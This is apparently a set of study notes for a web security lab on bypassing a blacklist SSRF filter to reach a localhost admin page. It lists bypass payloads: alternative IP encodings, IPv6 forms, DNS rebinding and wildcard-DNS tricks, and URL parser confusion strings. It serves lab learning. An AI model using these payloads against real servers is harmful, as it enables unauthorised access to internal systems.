SSRF Lab: SSRF with blacklist-based input filter

This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos. The developer has deployed two weak anti-SSRF defenses that you will need to bypass. 1. Alternative IP representations (core bypasses) These work because parsers normalize differently than filters. IPv4 variants 127.0.0.1 127.1 127.000.000.001 127.0.1 127.1.1.1 Integer (DWORD) 2130706433 Octal 017700000001 Hex 0x7f000001 Mixed encoding 127.0x0.0.1 0x7f.0.0.1 2. IPv6 tricks (very powerful) Many filters forget IPv6 entirely. ::1 [::1] 0:0:0:0:0:0:0:1 [::ffff:127.0.0.1] ← IPv4-mapped IPv6 (important) 3. DNS-based bypasses (your “own domain” idea) This is where things get interesting. Custom domain pointing to localhost attacker.com → 127.0.0.1 Wildcard DNS services 127.0.0.1.nip.io 127.0.0.1.xip.io Rebinding attacks (advanced) Domain resolves to public IP → then switches to 127.0.0.1 Used when: Server resolves DNS twice Or resolves late (TOCTOU) 4. URL parser confusion tricks Filters often check raw input, but backend parses differently. Username@host bypass http://[email protected] http://[email protected] (Some parsers treat localhost as username, real host = evil.com) Fragment bypass http://127.0.0.1#@evil.com Double @ trick http://127.0.0.1@@evil.com Semicolon trick http://127.0.0.1;evil.com 5. Encoding tricks (very common in labs) URL encoding http://%31%32%37.0.0.1 http://127.0.0.%31 Double encoding %252e → becomes %2e → . Mixed encoding http://127%2e0%2e0%2e1